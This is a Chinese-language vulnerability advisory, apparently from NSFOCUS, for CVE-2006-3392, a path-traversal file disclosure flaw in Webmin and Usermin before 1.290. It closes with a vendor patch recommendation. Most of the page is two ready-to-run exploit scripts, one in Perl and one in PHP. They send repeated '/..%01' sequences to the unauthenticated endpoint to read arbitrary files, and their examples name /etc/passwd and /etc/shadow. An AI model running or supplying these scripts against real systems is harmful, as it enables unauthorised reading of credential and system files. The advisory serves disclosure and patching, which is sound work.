安全研究
安全漏洞
Webmin/Usermin信息泄露漏洞
发布日期:2006-06-30
更新日期:2006-10-24
受影响系统:
Webmin Webmin < 1.220描述:
BUGTRAQ ID: 18744
CVE(CAN) ID: CVE-2006-3392
Webmin是一款基于WEB的Unix和Linux操作系统管理接口;Usermin则设计用于操作用户级别的任务,允许Unix系统中用户简单的进行接收邮件、执行SSH和邮件转发配置。
Webmin 1.290之前版本及Usermin 1.220之前版本在解码HTML之前调用simplify_path函数,可使远程攻击者读取任意文件。
<*来源:Kenny Chen
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit for WEBMIN and USERMIN less than 1.29x ARBITARY REMOTE FILE DISCLOSURE
# Thrusday 13th July 2006
# Vulnerability Disclosure at securitydot.net
# Coded by UmZ! umz32.dll@gmail.com
#
#
#
# Make sure you have LWP before using this exploit.
# USE IT AT YOUR OWN RISK
#
# GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................
# for other.. like AHMED n FAIZ ... (GET A LIFE MAN).
use LWP::Simple;
if (@ARGV < 3) {
print("Usage: $0 <url> <port> <filename>\n");
print("Define full path with file name \n");
print("Example: ./webmin.pl blah.com 10000 /etc/passwd\n");
exit(1);
}
($target, $port,$filename) = @ARGV;
print("WEBMIN EXPLOIT !!!!! coded by UmZ!\n");
print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com\n");
print("Vulnerability disclose at securitydot.net\nI am just coding it in perl 'cuz I hate PHP!\n");
print("Attacking $target on port $port!\n");
print("FILENAME: $filename\n");
$temp="/..%01" x 40;
my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
$content=get $url;
print("\n FILE CONTENT STARTED");
print("\n -----------------------------------\n");
print("$content");
print("\n -------------------------------------\n");
<?php
/*
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability
Date : 2006-06-30
Patch : update to version 1.290
Advisory : http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html
Coded by joffer , http://securitydot.net
*/
$host = $argv[1];
$port = $argv[2];
$http = $argv[3];
$file = $argv[4];
// CHECKING THE INPUT
if($host != "" && $port != "" && $http != "" && $file != "") {
$z = "/..%01";
for ($i=0;$i<60;$i++) {
$z.="/..%01";
}
$target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file."";
echo "Attacking ".$host."\n";
echo "---------------------------------\n";
// INITIALIZING CURL SESSION TO THE TARGET
$ch = curl_init();
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
$content = curl_exec($ch);
curl_close ($ch);
// CLOSING CURL
// ECHOING THE CONTENT OF THE $FILE
echo $content;
echo "---------------------------------\n";
echo "Coded by joffer , http://securitydot.net\n";
} else {
// IF INPUT IS NOT CORRECT DISPLAY THE README
echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILE\n";
echo "Example : php webmin.php localhost 10000 http /etc/shadow\n";
echo "Coded by joffer , http://securitydot.net\n";
}
?>
建议:
厂商补丁:
Webmin
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.webmin.com/webmin/
浏览次数:1982
严重程度:0(网友投票)
绿盟科技给您安全的保障